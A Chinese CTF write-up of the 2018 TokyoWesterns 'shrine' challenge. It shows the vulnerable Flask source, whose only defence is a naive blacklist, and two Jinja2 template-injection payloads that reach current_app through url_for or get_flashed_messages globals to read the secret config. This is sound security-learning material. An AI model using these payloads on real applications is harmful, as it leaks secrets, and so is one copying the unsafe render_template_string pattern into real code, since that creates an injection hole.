2018-TokyoWesterns-Web-shrine
杜霍英
前言
要去好好学一下python了,python的SSTI做起来真的好难,就感觉自己没学过python一样,这道题查了很多的资料,还是感觉似懂非懂,还是对python学的太浅了,因为目前自己还是停留在写写小爬虫小脚本的基础上。还有php,如果学习python或者php都站在开发的角度上来进行深入的学习,学成之后再去看这些内容肯定会非常的轻松,但是自己一开始觉得搞安全可以不搞开发,能审出洞就可以了,事实上如果不懂开发,连代码都看不懂,真的是拿头去审。所以关于SSTI就暂时做到这个题目,接下来关于ctf的学习也暂时停下来,去学一下php和python的开发,之后可能就是java,go这样的,真正代码能力上去了,做ctf应该就会轻松很多了。
WP
python的flask模板的代码审计:
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True, port=80)
可以看到FLAG在环境变量里,但是config和self都被设置为了None,而且括号也被过滤,因此要想办法去读全局变量,这题利用的是current_app。其中url_for和get_flashed_messages中都找到了current_app,因此利用方式有2种:
/shrine/{{url_for.__globals__['current_app'].config['FLAG']}}
或者
/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}
都可以成功读到flag。
参考的文章:
Shrine
Flask/Jinja2 SSTI && python 沙箱逃逸
Python模板注入(SSTI)深入学习
flask之ssti模版注入从零到入门
类似资料: